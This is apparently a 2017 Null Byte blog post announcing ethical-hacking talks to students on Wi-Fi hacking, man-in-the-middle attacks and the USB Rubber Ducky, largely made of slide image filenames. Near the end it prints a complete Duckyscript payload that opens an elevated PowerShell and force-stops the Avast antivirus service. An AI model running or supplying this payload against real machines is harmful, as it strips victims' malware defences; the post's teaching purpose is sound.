Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber Ducky

Oct 3, 2017 08:23 AM
Oct 16, 2017 03:16 PM

Null Byte users have often requested video content, but the question has always been what format would best serve our community. This week, we partnered with Null Space Labs, a hackerspace in Los Angeles, to test the waters by hosting a series of talks on ethical hacking for students in Pasadena Computer Science Club. We invited students and Null Byte writers to deliver talks on Wi-Fi hacking, MITM attacks, and rogue devices like the USB Rubber Ducky.

636425764298728015.jpg

Pasadena CS Students attend Null Byte and Null Space Labs's Ethical Hacking talk.

636425866109499643.jpg

Our "Google Starbucks" network demonstrating how to capture wireless hosts.

636425866811685013.jpg

Kody Kinzie explains the attackers behind Wi-Fi hacking.

636425867370748696.jpg

Ian explaining how to encode IP addresses to hide them from firewalls.

636425764298728015.jpg

Pasadena CS Students attend Null Byte and Null Space Labs's Ethical Hacking talk.

636425866109499643.jpg

Our "Google Starbucks" network demonstrating how to capture wireless hosts.

636425866811685013.jpg

Kody Kinzie explains the attackers behind Wi-Fi hacking.

636425867370748696.jpg

Ian explaining how to encode IP addresses to hide them from firewalls.

While our first live stream started slightly delayed, our group of writers and students is excited to bring you the first of our workshops and presentations. Below, you can catch the recorded streams of the events, as well as the decks from each talk where applicable.

Wi-Fi Hacking: Who Hacks Wi-Fi & What Tools Do They Use?

By Kody Kinzie

636425821947946563.jpg

Kody Kinzie speaks on Wi-Fi hacking threats in 2017

Use of Wi-Fi is incredibly widespread in 2017. In the city of Los Angeles alone, there are hundreds of thousands of wireless networks, many of which touch critical infrastructure. Kody Kinzie is a CS student researching Wi-Fi security, and the tactics people use to break it.

Kody explains the tactics currently used to break or bypass the technology that makes Wi-Fi secure, and the motivations behind groups who hack Wi-Fi in 2017. In addition, the basic tools used by each threat group are discussed relative to how much skill is required to use them.

636425729294509319.jpg
636425729508886200.jpg
636425729789667539.jpg
636425730005602880.jpg
636425730317478423.jpg
636425730573103680.jpg
636425730809353002.jpg
636425730981384883.jpg
636425731184821882.jpg
636425731406384454.jpg
636425731602634374.jpg
636425731826540796.jpg
636425731998727839.jpg
636425732216385541.jpg
636425732416542544.jpg
636425732640603086.jpg
636425732833259459.jpg
636425733062165365.jpg
636425733244197713.jpg
636425729294509319.jpg
636425729508886200.jpg
636425729789667539.jpg
636425730005602880.jpg
636425730317478423.jpg
636425730573103680.jpg
636425730809353002.jpg
636425730981384883.jpg
636425731184821882.jpg
636425731406384454.jpg
636425731602634374.jpg
636425731826540796.jpg
636425731998727839.jpg
636425732216385541.jpg
636425732416542544.jpg
636425732640603086.jpg
636425732833259459.jpg
636425733062165365.jpg
636425733244197713.jpg

Check out these related articles:

MITM Attacks: Network Sniffing Over Routers/Switches

By Ian O'Neill

636425837254809988.jpg

Ian O'Neill explains MITM attacks to computer science students.

Man in the Middle attacks intercept and redirect traffic, and can be extremely dangerous when employed correctly. Ian O'Neill explains in detail the fundamentals of a MITM attack, from creating a fake network to downgrading HTTPS connections to HTTP.

MITM attacks continue to present a viable threat when users fall for phishing and ignore warnings, in spite of the trend towards HTTPS and more secure internet connections. Take a trip to the dark side with us to explore the hands-on ways an attacker can employ an effective MITM attack.

636425751697946290.jpg
636425752228729783.jpg
636425754017321934.jpg
636425754211073433.jpg
636425754383415516.jpg
636425754597165769.jpg
636425754770446596.jpg
636425755038103058.jpg
636425755287790463.jpg
636425755492478271.jpg
636425755674978197.jpg
636425755865915291.jpg
636425756018727797.jpg
636425756257165691.jpg
636425756412634352.jpg
636425756574353219.jpg
636425756735134251.jpg
636425757044821979.jpg
636425757406540717.jpg
636425757585135754.jpg
636425757767167378.jpg
636425757919977956.jpg
636425758117321568.jpg
636425758306540600.jpg
636425758463415909.jpg
636425758604822926.jpg
636425758804666110.jpg
636425759031696814.jpg
636425759220917896.jpg
636425759429354670.jpg
636425759717478141.jpg
636425751697946290.jpg
636425752228729783.jpg
636425754017321934.jpg
636425754211073433.jpg
636425754383415516.jpg
636425754597165769.jpg
636425754770446596.jpg
636425755038103058.jpg
636425755287790463.jpg
636425755492478271.jpg
636425755674978197.jpg
636425755865915291.jpg
636425756018727797.jpg
636425756257165691.jpg
636425756412634352.jpg
636425756574353219.jpg
636425756735134251.jpg
636425757044821979.jpg
636425757406540717.jpg
636425757585135754.jpg
636425757767167378.jpg
636425757919977956.jpg
636425758117321568.jpg
636425758306540600.jpg
636425758463415909.jpg
636425758604822926.jpg
636425758804666110.jpg
636425759031696814.jpg
636425759220917896.jpg
636425759429354670.jpg
636425759717478141.jpg

Check out these related articles:

Rogue Devices: Antivirus Disabler Script on the USB Rubber Ducky

By Tim Schellin

636425842397153700.jpg

Tim demonstrates a USB Rubber Ducky payload.

Antivirus is the first line of defense for most systems, allowing even well-crafted malware to be defeated before deploying a payload. Timothy Shellion is a CS student using the USB Rubber Ducky to design payloads to defeat antivirus, and explains what a rogue device like a USB Rubber Ducky is, and how it works.

Timothy demonstrates his simple Duckyscript code to disable antivirus on Windows, and explains how the device can be used to defeat even well-defended systems when physical access is achieved. The potential of this device reach far beyond simply disabling antivirus, and the process of creating a payload for a rogue device is explained.

636426352293560262.jpg
636426352492466318.jpg
636426352639186228.jpg
636426352771372855.jpg
636426352897310459.jpg
636426353016997774.jpg
636426353171372671.jpg
636426353300748072.jpg
636426352293560262.jpg
636426352492466318.jpg
636426352639186228.jpg
636426352771372855.jpg
636426352897310459.jpg
636426353016997774.jpg
636426353171372671.jpg
636426353300748072.jpg

You can see Tim's Duckyscript to disable Windows Antivirus here:

DELAY 300

GUI s

DELAY 300

STRING powershell

DELAY 500

CTRL-SHIFT ENTER

DELAY 500

STRING get-service

ENTER

DELAY 750

STRING stop-service -force "avast! antivirus"

ENTER

DELAY 750

ENTER

DELAY 500

STRING get-service "avast! antivirus"

ENTER

Check out these related articles:

Want More Video Content?

If you enjoyed this and would like to see more video content, let us know in the comments below. Thank you to Null Space Labs, and Pasadena Computer Science Club for helping us put on our first Null Byte event. If you're in the SoCal area and interested in getting involved in our of our talks or workshops, please reach out to us on Twitter!

Cover photo by Null Byte

Comments

No Comments Exist

Be the first, drop a comment!